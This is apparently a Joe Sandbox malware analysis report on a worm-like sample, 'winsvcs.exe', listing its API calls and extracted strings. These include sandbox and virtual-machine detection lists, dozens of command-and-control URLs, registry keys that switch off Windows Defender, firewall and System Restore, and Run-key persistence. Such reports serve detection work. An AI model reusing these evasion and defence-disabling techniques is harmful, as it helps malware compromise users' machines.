IsRectEmpty.USER32(?), ref: 0040EBBC
GetSystemTime.KERNEL32(?), ref: 0040EBCE
SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
EndPaint.USER32(0044A660,?), ref: 0040EBF4
GetClientRect.USER32(0044A660,?), ref: 0040EC12
SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
GetClientRect.USER32(0044A660,?), ref: 0040EC6E
StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
DeleteDC.GDI32(00000000), ref: 0040ECF1
GetCursorInfo.USER32(?), ref: 0040ED25
GetCursorPos.USER32(?), ref: 0040ED53
WindowFromPoint.USER32(?,?), ref: 0040ED67
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
GetCurrentThreadId.KERNEL32 ref: 0040ED7C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
GetCursor.USER32 ref: 0040ED96
AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
GetCursor.USER32 ref: 0040EDAC
StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
_printf.LIBCMT ref: 0040EDFB
EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
GetActiveWindow.USER32 ref: 0040EE2A
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
GetModuleHandleA.KERNEL32(00000000), ref: 0040EF40
LoadIconA.USER32(00000000,0043ABC0), ref: 0040EF4C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040EF5B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F048
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F058
GetModuleHandleA.KERNEL32(00000000), ref: 0040F060
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F06C
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F07B
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F120
SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040F130
GetModuleHandleA.KERNEL32(00000000), ref: 0040F138
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F144
SendMessageA.USER32(0044A660,00000080,00000000,00000000), ref: 0040F153

Strings

<, xrefs: 0040DA42
<, xrefs: 0040D20D
<, xrefs: 0040C955
<, xrefs: 0040E3EB
<, xrefs: 0040CA99
<, xrefs: 0040C3EF
<, xrefs: 0040D2D3
<, xrefs: 0040CFE8
<, xrefs: 0040C30F
<, xrefs: 0040CCED
<, xrefs: 0040BFDC
<, xrefs: 0040B5EC
<, xrefs: 0040BA4C
<, xrefs: 0040D710
<, xrefs: 0040E267

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Load$Create$Move$Window$Line$Rect$MessageSend$HandleIconModule$Client$BitmapImage$Object$Select$CursorFont$ColorIndirectText$BrushInvalidateItemSolid$Thread$Timer$AttachInputPaint$ActiveBeginCurrentDeleteDesktopEmptyEnumFamiliesFolderFromInfoKillMallocMenuPointPopupProcessStretchSystemTimeTrack_printf
String ID: <$<$<$<$<$<$<$<$<$<$<$<$<$<$<
API String ID: 246057343-461452962
Opcode ID: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction ID: a9c2557e841c6cb4aed079c13c2012efc5e0e09a695cb913e2437938431cc45a
Opcode Fuzzy Hash: 0615ab20f80db0ce47b714d71192f47400314b003bc0dc12f5ea39a8590d0e37
Instruction Fuzzy Hash: 1773C070548340AFE3348F60DC89FEB77B9FF99305F045929FA4992290D7B86845CB6A

Function 004032A4 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 205
sleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004032BF
memset.MSVCRT ref: 004032D5
FindFirstFileW.KERNEL32(*.*,?), ref: 004032E9
SetCurrentDirectoryW.KERNEL32(?), ref: 0040332A

Part of subcall function 004032A4: SetCurrentDirectoryW.KERNEL32(00406BD4), ref: 0040333F
Part of subcall function 004032A4: Sleep.KERNEL32(000003E8), ref: 004034F0
Part of subcall function 004032A4: PathFindFileNameW.SHLWAPI(?), ref: 0040353F
Part of subcall function 004032A4: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00403575
Part of subcall function 004032A4: DeleteFileW.KERNEL32(00000000), ref: 00403581
Part of subcall function 004032A4: Sleep.KERNEL32(000001F4), ref: 0040358C
Part of subcall function 004032A4: CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe,?,00000000), ref: 004035A0
Part of subcall function 004032A4: Sleep.KERNEL32(00000064), ref: 004035A8

GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00403361
CharLowerW.USER32(?), ref: 004033FB
Sleep.KERNEL32(000003E8), ref: 00403430
Sleep.KERNEL32(000003E8), ref: 00403470
Sleep.KERNEL32(000003E8), ref: 004034B0
Sleep.KERNEL32(00000064), ref: 004035B5
FindNextFileW.KERNEL32(000000FF,?), ref: 004035C8
FindClose.KERNEL32(000000FF), ref: 004035DC

Strings

Recycle.Bin, xrefs: 0040336F
C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe, xrefs: 0040341F, 00403457, 00403497, 004034D7, 0040359B
.tar, xrefs: 004034B6
.rar, xrefs: 00403436
.7z, xrefs: 00403476
*.*, xrefs: 004032E4
Windows Archive Manager.exe, xrefs: 00403452
Windows Archive Manager.exe, xrefs: 004034D2
.zip, xrefs: 00403401
Windows Archive Manager.exe, xrefs: 00403492
.exe, xrefs: 00403554

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: Sleep$File$Find$CurrentDirectoryNamePathmemset$AttributesCharCloseCopyDeleteFirstFullLowerNext
String ID: *.*$.7z$.exe$.rar$.tar$.zip$C:\Users\user\AppData\Local\Temp\Windows Archive Manager.exe$Recycle.Bin$Windows Archive Manager.exe$Windows Archive Manager.exe$Windows Archive Manager.exe
API String ID: 3651916915-1537326886
Opcode ID: 0eae164103ee7fbc4dc8609290cbb788cf102168f8367d84f2ccf246b0e4433d
Instruction ID: 13ad03c69c0ac6c2c187dcc74027e427e02459b5877deabd40d7f6eaf18e51b9
Opcode Fuzzy Hash: 0eae164103ee7fbc4dc8609290cbb788cf102168f8367d84f2ccf246b0e4433d
Instruction Fuzzy Hash: 6D817F71904618AFEB209F60DD49B9E77B9EB44305F5001FAF109F61D0EF7A9A948F18

Function 0040317D Relevance: 50.8, APIs: 8, Strings: 21, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
ExitProcess.KERNEL32 ref: 00403230
Sleep.KERNEL32(00000064), ref: 00403238
ExitProcess.KERNEL32 ref: 00403264
Sleep.KERNEL32(00000064), ref: 0040326E
GetModuleHandleA.KERNEL32(00407204), ref: 0040328E
ExitProcess.KERNEL32 ref: 0040329A

Strings

vmwareuser.exe, xrefs: 004031E5
vboxtray.exe, xrefs: 004031BB
vmwareservice.exe, xrefs: 004031C9
sbiedll.dll, xrefs: 004031EC
pythonw.exe, xrefs: 0040318A
vmwaretray.exe, xrefs: 004031D0
kernel32.dll, xrefs: 00403208
tpautoconnsvc.exe, xrefs: 004031D7
dir_watch.dll, xrefs: 004031FA
python.exe, xrefs: 00403183
vmtoolsd.exe, xrefs: 004031DE
wine_get_unix_file_name, xrefs: 0040321C
vmusrvc.exe, xrefs: 004031A6
vboxcontrol.exe, xrefs: 004031C2
prl_cc.exe, xrefs: 00403191
sbiedllx.dll, xrefs: 004031F3
wpespy.dll, xrefs: 00403201
prl_tools.exe, xrefs: 00403198
vboxservice.exe, xrefs: 004031B4
xenservice.exe, xrefs: 004031AD
vmsrvc.exe, xrefs: 0040319F

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: ExitProcess$HandleModuleSleep$AddressProc
String ID: dir_watch.dll$kernel32.dll$prl_cc.exe$prl_tools.exe$python.exe$pythonw.exe$sbiedll.dll$sbiedllx.dll$tpautoconnsvc.exe$vboxcontrol.exe$vboxservice.exe$vboxtray.exe$vmsrvc.exe$vmtoolsd.exe$vmusrvc.exe$vmwareservice.exe$vmwaretray.exe$vmwareuser.exe$wine_get_unix_file_name$wpespy.dll$xenservice.exe
API String ID: 2350661518-2780004707
Opcode ID: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
Instruction ID: b154389cd1554f0ebcfe2a125868a98a7489832b6cac9f633827aa8e2f46737f
Opcode Fuzzy Hash: 2c99b960dabda3c5d574f0276161d8c334fbf934ae172afdc13c89edaa95b338
Instruction Fuzzy Hash: 1831A570D08248DBDB109FE4DD4869EBFB4BB05705F10806AE502BE2D4C7B86949CF9E

Function 00479044 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00479223

Strings

GetT, xrefs: 00479188
catA, xrefs: 004791AF
Clos, xrefs: 00479129
lstr, xrefs: 004791A7
dleA, xrefs: 004790D0
Writ, xrefs: 00479148
el32, xrefs: 004790FB
Crea, xrefs: 00479169
odul, xrefs: 0047922D
athA, xrefs: 00479199
Kern, xrefs: 004790F4
GetM, xrefs: 004790B6
WinE, xrefs: 00479110
.dll, xrefs: 00479102
XBVdJN.exe, xrefs: 004791FD, 00479200

Memory Dump Source

Source File: 00000006.00000002.4802229274.0000000000479000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00479000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_479000_winsvcs.jbxd

Similarity

API ID: CreateFile
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$XBVdJN.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 823142352-4190719182
Opcode ID: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction ID: 58ba0b43668d7517482e7b7aa96e86c75ac4398e6d64cdf10e80ef0de2497ba1
Opcode Fuzzy Hash: 007e8a4e92f682bde4b241dc15a2dd410ce45e6995b4150c4417facc29203dea
Instruction Fuzzy Hash: 89611774D002169BDF24CF94C888AEEB7B5FB44315F64C2ABD409AB701C7789E91CB99

Function 0040373E Relevance: 434.8, APIs: 82, Strings: 166, Instructions: 813
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8,?,?,?,00401182,00000000,?,0000000A), ref: 00403752

Part of subcall function 0040317D: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040320D
Part of subcall function 0040317D: GetProcAddress.KERNEL32(00000000,wine_get_unix_file_name), ref: 00403224
Part of subcall function 0040317D: ExitProcess.KERNEL32 ref: 00403230

CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00403CEA
GetLastError.KERNEL32 ref: 00403CF6
ExitProcess.KERNEL32 ref: 00403D05
memset.MSVCRT ref: 00403D2A
memset.MSVCRT ref: 00403D40
memset.MSVCRT ref: 00403D56
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D6C
_snwprintf.MSVCRT ref: 00403D8A
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403D99
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000A), ref: 00403DA4
memset.MSVCRT ref: 00403DDB
memset.MSVCRT ref: 00403DF1
memset.MSVCRT ref: 00403E07
ExpandEnvironmentStringsW.KERNEL32(?,?,00000208), ref: 00403E28
_snwprintf.MSVCRT ref: 00403E46
_snwprintf.MSVCRT ref: 00403E6D
PathFileExistsW.SHLWAPI(?), ref: 00403E7C
Sleep.KERNEL32(000001F4), ref: 00403EDB

Strings

http://afeifieuuufufufuf.info/, xrefs: 00403C99
http://ssofhoseuegsgrfnj.biz/, xrefs: 00403A87
http://afeifieuuufufufuf.biz/, xrefs: 00403C03
http://fifiehsueuufidhfi.net/, xrefs: 00403A73
http://eoroooskfogihisrg.ru/, xrefs: 0040386B
winsvcs.exe, xrefs: 00403770
http://nousiieiffgogogoo.in/, xrefs: 004039D3
http://noeuaoenriusfiruu.info/, xrefs: 00403C85
%ls\94000696690303050, xrefs: 00403E35
http://aiiaiafrzrueuedur.ru/, xrefs: 0040384D
http://iuirshriuisruruuf.biz/, xrefs: 00403ACD
http://fiiauediehduefuge.com/, xrefs: 00403B81
t.exe, xrefs: 0040378F
http://fuaiuebndieufeufu.in/, xrefs: 00403983
x, xrefs: 0040463F
http://ssofhoseuegsgrfnj.in/, xrefs: 00403965
http://aiiaiafrzrueuedur.biz/, xrefs: 00403BC7
http://eoroooskfogihisrg.in/, xrefs: 00403997
http://afeifieuuufufufuf.biz/, xrefs: 00403AD7
http://ssofhoseuegsgrfnj.info/, xrefs: 00403C49
AutoUpdateDisableNotify, xrefs: 0040381B
http://iuirshriuisruruuf.com/, xrefs: 00403B63
http://fiiauediehduefuge.net/, xrefs: 00403A5F
http://eiifngjfksisiufjf.biz/, xrefs: 00403BDB
%userprofile%, xrefs: 004037CB
http://fifiehsueuufidhfi.su/, xrefs: 00403947
http://slpsrgpsrhojifdij.su/, xrefs: 004038D9
http://ssofhoseuegsgrfnj.su/, xrefs: 004038CF
http://ssofhoseuegsgrfnu.ru/, xrefs: 0040382F
http://nousiieiffgogogoo.info/, xrefs: 00403CB7
DisableScanOnRealtimeEnable, xrefs: 00404339
http://afeifieuuufufufuf.su/, xrefs: 0040391F
http://afeifieuuufufufuf.ru/, xrefs: 00403889
http://aiiaiafrzrueuedur.net/, xrefs: 00403A0F
http://eofihsishihiursgu.com/, xrefs: 00403B9F
http://fiiauediehduefuge.biz/, xrefs: 00403C17
http://eoroooskfogihisrg.info/, xrefs: 00403C7B
http://aiiaiafrzrueuedur.biz/, xrefs: 00403A9B
SOFTWARE\Microsoft\Security Center\, xrefs: 00404406
m.exe, xrefs: 00403799
%ls\%ls, xrefs: 00403E5C
http://noeuaoenriusfiruu.ru/, xrefs: 00403875
SOFTWARE\Policies\Microsoft\Windows Defender\, xrefs: 0040422E
http://eofihsishihiursgu.net/, xrefs: 00403A7D
http://iuirshriuisruruuf.in/, xrefs: 004039AB
DisableAntiSpyware, xrefs: 00404280
http://aiiaiafrzrueuedur.in/, xrefs: 00403979
http://noeuaoenriusfiruu.biz/, xrefs: 00403BEF
http://iuirshriuisruruuf.info/, xrefs: 00403C8F
http://fuaiuebndieufeufu.biz/, xrefs: 00403AA5
http://srndndubsbsifurfd.in/, xrefs: 004039BF
http://noeuaoenriusfiruu.su/, xrefs: 0040390B
http://eofihsishihiursgu.in/, xrefs: 004039E7
%ls:Zone.Identifier, xrefs: 00403D79
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00403FD3
http://iuirshriuisruruuf.biz/, xrefs: 00403BF9
FirewallDisableNotify, xrefs: 00403825
http://eoroooskfogihisrg.net/, xrefs: 00403A2D
http://eoroooskfogihisrg.biz/, xrefs: 00403AB9
http://iuirshriuisruruuf.ru/, xrefs: 0040387F
http://fuaiuebndieufeufu.info/, xrefs: 00403C67
http://fiiauediehduefuge.in/, xrefs: 004039C9
http://srndndubsbsifurfd.biz/, xrefs: 00403C0D
http://eofihsishihiursgu.ru/, xrefs: 004038BB
AntiVirusOverride, xrefs: 004037E9
http://eiifngjfksisiufjf.biz/, xrefs: 00403AAF
DisableScanOnRealtimeEnable, xrefs: 0040430C
http://srndndubsbsifurfd.su/, xrefs: 00403929
http://afeifieuuufufufuf.com/, xrefs: 00403B6D
http://92.63.197.48/, xrefs: 00403839
http://fuaiuebndieufeufu.ru/, xrefs: 00403857
http://nousiieiffgogogoo.net/, xrefs: 00403A69
http://ssofhoseuegsgrfnj.biz/, xrefs: 00403BB3
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\, xrefs: 00404154
4950050503930, xrefs: 0040375D
http://nousiieiffgogogoo.biz/, xrefs: 00403AF5
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 0040429F
http://eiifngjfksisiufjf.com/, xrefs: 00403B45
%appdata%, xrefs: 004037D5
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040407E
http://afeifieuuufufufuf.in/, xrefs: 004039B5
http://nnososoosjfeuhueu.ru/, xrefs: 004038C5
http://slpsrgpsrhojifdij.net/, xrefs: 00403A05
http://nousiieiffgogogoo.biz/, xrefs: 00403C21
http://nnososoosjfeuhueu.net/, xrefs: 00403B13
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\, xrefs: 004042E7
%windir%, xrefs: 004037C1
http://nousiieiffgogogoo.su/, xrefs: 0040393D
http://nnososoosjfeuhueu.in/, xrefs: 004039F1
SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\, xrefs: 00404562
http://eoroooskfogihisrg.su/, xrefs: 00403901
http://nnososoosjfeuhueu.info/, xrefs: 00403CD5
http://slpsrgpsrhojifdij.info/, xrefs: 00403C53
DisableSR, xrefs: 00404583
http://noeuaoenriusfiruu.com/, xrefs: 00403B59
http://eiifngjfksisiufjf.in/, xrefs: 0040398D
DisableOnAccessProtection, xrefs: 00404384
AntiVirusDisableNotify, xrefs: 00403807
http://srndndubsbsifurfd.com/, xrefs: 00403B77
http://fifiehsueuufidhfi.ru/, xrefs: 004038B1
http://eofihsishihiursgu.biz/, xrefs: 00403B09
x, xrefs: 00404694
http://slpsrgpsrhojifdij.biz/, xrefs: 00403BBD
http://noeuaoenriusfiruu.in/, xrefs: 004039A1
http://fiiauediehduefuge.info/, xrefs: 00403CAD
http://slpsrgpsrhojifdij.com/, xrefs: 00403B27
http://eiifngjfksisiufjf.su/, xrefs: 004038F7
http://ssofhoseuegsgrfnj.net/, xrefs: 004039FB
http://nnososoosjfeuhueu.biz/, xrefs: 00403C3F
DisableSR, xrefs: 004045B0
http://afeifieuuufufufuf.net/, xrefs: 00403A4B
http://eoroooskfogihisrg.com/, xrefs: 00403B4F
http://fifiehsueuufidhfi.biz/, xrefs: 00403C2B
http://fiiauediehduefuge.ru/, xrefs: 0040389D
DisableAntiSpyware, xrefs: 00404253
http://nnososoosjfeuhueu.su/, xrefs: 0040395B
FirewallOverride, xrefs: 004037FD
http://eofihsishihiursgu.info/, xrefs: 00403CCB
http://fifiehsueuufidhfi.in/, xrefs: 004039DD
DisableOnAccessProtection, xrefs: 00404357
s.exe, xrefs: 004037AD
http://noeuaoenriusfiruu.net/, xrefs: 00403A37
%s%s, xrefs: 00404751
http://fuaiuebndieufeufu.su/, xrefs: 004038ED
SOFTWARE\Microsoft\Security Center\Svc\, xrefs: 004044B4
http://aiiaiafrzrueuedur.com/, xrefs: 00403B31
http://eofihsishihiursgu.biz/, xrefs: 00403C35
UpdatesDisableNotify, xrefs: 00403811
http://eiifngjfksisiufjf.net/, xrefs: 00403A23
SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection, xrefs: 004042C9
http://srndndubsbsifurfd.info/, xrefs: 00403CA3
http://fiiauediehduefuge.biz/, xrefs: 00403AEB
http://srndndubsbsifurfd.net/, xrefs: 00403A55
http://eiifngjfksisiufjf.ru/, xrefs: 00403861
http://nousiieiffgogogoo.ru/, xrefs: 004038A7
http://fuaiuebndieufeufu.net/, xrefs: 00403A19
o.exe, xrefs: 004037B7
Microsoft Windows Services, xrefs: 00403780
DisableBehaviorMonitoring, xrefs: 004043A2
%temp%, xrefs: 004037DF
http://fiiauediehduefuge.su/, xrefs: 00403933
http://slpsrgpsrhojifdij.ru/, xrefs: 00403843
http://eoroooskfogihisrg.biz/, xrefs: 00403BE5
http://fuaiuebndieufeufu.com/, xrefs: 00403B3B
http://srndndubsbsifurfd.biz/, xrefs: 00403AE1
http://noeuaoenriusfiruu.biz/, xrefs: 00403AC3
p.exe, xrefs: 004037A3
DisableBehaviorMonitoring, xrefs: 004043CF
http://aiiaiafrzrueuedur.su/, xrefs: 004038E3
UpdatesOverride, xrefs: 004037F3
http://nnososoosjfeuhueu.com/, xrefs: 00403BA9
http://aiiaiafrzrueuedur.info/, xrefs: 00403C5D
http://ssofhoseuegsgrfnj.com/, xrefs: 00403B1D
http://slpsrgpsrhojifdij.biz/, xrefs: 00403A91
http://nousiieiffgogogoo.com/, xrefs: 00403B8B
http://fuaiuebndieufeufu.biz/, xrefs: 00403BD1
http://iuirshriuisruruuf.su/, xrefs: 00403915
http://eiifngjfksisiufjf.info/, xrefs: 00403C71
http://fifiehsueuufidhfi.info/, xrefs: 00403CC1
http://srndndubsbsifurfd.ru/, xrefs: 00403893
http://fifiehsueuufidhfi.biz/, xrefs: 00403AFF
http://iuirshriuisruruuf.net/, xrefs: 00403A41
%ls:*:Enabled:%s, xrefs: 00403EEF
http://eofihsishihiursgu.su/, xrefs: 00403951
http://slpsrgpsrhojifdij.in/, xrefs: 0040396F
http://fifiehsueuufidhfi.com/, xrefs: 00403B95

Memory Dump Source

Source File: 00000006.00000002.4799671408.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.4799644748.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801909333.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.4801947345.0000000000409000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_winsvcs.jbxd

Similarity

API ID: memset$FileSleep_snwprintf$ExitModuleProcess$AddressCreateDeleteEnvironmentErrorExistsExpandHandleLastMutexNamePathProcStrings
String ID: %appdata%$%ls:*:Enabled:%s$%ls:Zone.Identifier$%ls\%ls$%ls\94000696690303050$%s%s$%temp%$%userprofile%$%windir%$4950050503930$AntiVirusDisableNotify$AntiVirusOverride$AutoUpdateDisableNotify$DisableAntiSpyware$DisableAntiSpyware$DisableBehaviorMonitoring$DisableBehaviorMonitoring$DisableOnAccessProtection$DisableOnAccessProtection$DisableSR$DisableSR$DisableScanOnRealtimeEnable$DisableScanOnRealtimeEnable$FirewallDisableNotify$FirewallOverride$Microsoft Windows Services$SOFTWARE\Microsoft\Security Center\$SOFTWARE\Microsoft\Security Center\Svc\$SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SOFTWARE\Policies\Microsoft\Windows Defender\$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection$SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesOverride$http://92.63.197.48/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.biz/$http://afeifieuuufufufuf.com/$http://afeifieuuufufufuf.in/$http://afeifieuuufufufuf.info/$http://afeifieuuufufufuf.net/$http://afeifieuuufufufuf.ru/$http://afeifieuuufufufuf.su/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.biz/$http://aiiaiafrzrueuedur.com/$http://aiiaiafrzrueuedur.in/$http://aiiaiafrzrueuedur.info/$http://aiiaiafrzrueuedur.net/$http://aiiaiafrzrueuedur.ru/$http://aiiaiafrzrueuedur.su/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.biz/$http://eiifngjfksisiufjf.com/$http://eiifngjfksisiufjf.in/$http://eiifngjfksisiufjf.info/$http://eiifngjfksisiufjf.net/$http://eiifngjfksisiufjf.ru/$http://eiifngjfksisiufjf.su/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.biz/$http://eofihsishihiursgu.com/$http://eofihsishihiursgu.in/$http://eofihsishihiursgu.info/$http://eofihsishihiursgu.net/$http://eofihsishihiursgu.ru/$http://eofihsishihiursgu.su/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.biz/$http://eoroooskfogihisrg.com/$http://eoroooskfogihisrg.in/$http://eoroooskfogihisrg.info/$http://eoroooskfogihisrg.net/$http://eoroooskfogihisrg.ru/$http://eoroooskfogihisrg.su/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.biz/$http://fifiehsueuufidhfi.com/$http://fifiehsueuufidhfi.in/$http://fifiehsueuufidhfi.info/$http://fifiehsueuufidhfi.net/$http://fifiehsueuufidhfi.ru/$http://fifiehsueuufidhfi.su/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.biz/$http://fiiauediehduefuge.com/$http://fiiauediehduefuge.in/$http://fiiauediehduefuge.info/$http://fiiauediehduefuge.net/$http://fiiauediehduefuge.ru/$http://fiiauediehduefuge.su/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.biz/$http://fuaiuebndieufeufu.com/$http://fuaiuebndieufeufu.in/$http://fuaiuebndieufeufu.info/$http://fuaiuebndieufeufu.net/$http://fuaiuebndieufeufu.ru/$http://fuaiuebndieufeufu.su/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.biz/$http://iuirshriuisruruuf.com/$http://iuirshriuisruruuf.in/$http://iuirshriuisruruuf.info/$http://iuirshriuisruruuf.net/$http://iuirshriuisruruuf.ru/$http://iuirshriuisruruuf.su/$http://nnososoosjfeuhueu.biz/$http://nnososoosjfeuhueu.com/$http://nnososoosjfeuhueu.in/$http://nnososoosjfeuhueu.info/$http://nnososoosjfeuhueu.net/$http://nnososoosjfeuhueu.ru/$http://nnososoosjfeuhueu.su/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.biz/$http://noeuaoenriusfiruu.com/$http://noeuaoenriusfiruu.in/$http://noeuaoenriusfiruu.info/$http://noeuaoenriusfiruu.net/$http://noeuaoenriusfiruu.ru/$http://noeuaoenriusfiruu.su/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.biz/$http://nousiieiffgogogoo.com/$http://nousiieiffgogogoo.in/$http://nousiieiffgogogoo.info/$http://nousiieiffgogogoo.net/$http://nousiieiffgogogoo.ru/$http://nousiieiffgogogoo.su/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.biz/$http://slpsrgpsrhojifdij.com/$http://slpsrgpsrhojifdij.in/$http://slpsrgpsrhojifdij.info/$http://slpsrgpsrhojifdij.net/$http://slpsrgpsrhojifdij.ru/$http://slpsrgpsrhojifdij.su/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.biz/$http://srndndubsbsifurfd.com/$http://srndndubsbsifurfd.in/$http://srndndubsbsifurfd.info/$http://srndndubsbsifurfd.net/$http://srndndubsbsifurfd.ru/$http://srndndubsbsifurfd.su/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.biz/$http://ssofhoseuegsgrfnj.com/$http://ssofhoseuegsgrfnj.in/$http://ssofhoseuegsgrfnj.info/$http://ssofhoseuegsgrfnj.net/$http://ssofhoseuegsgrfnj.su/$http://ssofhoseuegsgrfnu.ru/$m.exe$o.exe$p.exe$s.exe$t.exe$winsvcs.exe$x$x
API String ID: 2238563751-1929099517
Opcode ID: f465d73126e8367d1ffc007a02f79c674ac2dcc4ef3619fa4bc65965357681e1
Instruction ID: 998e279ab630b6434e1c0101dc3529ca0b686cab9416bf1021e7191076eb0e73
Opcode Fuzzy Hash: f465d73126e8367d1ffc007a02f79c674ac2dcc4ef3619fa4bc65965357681e1
Instruction Fuzzy Hash: 43923DB0A407699EEF20DF50DD49BDAB7B4FB04705F0080EAE249BA1D1C7B85A84CF59

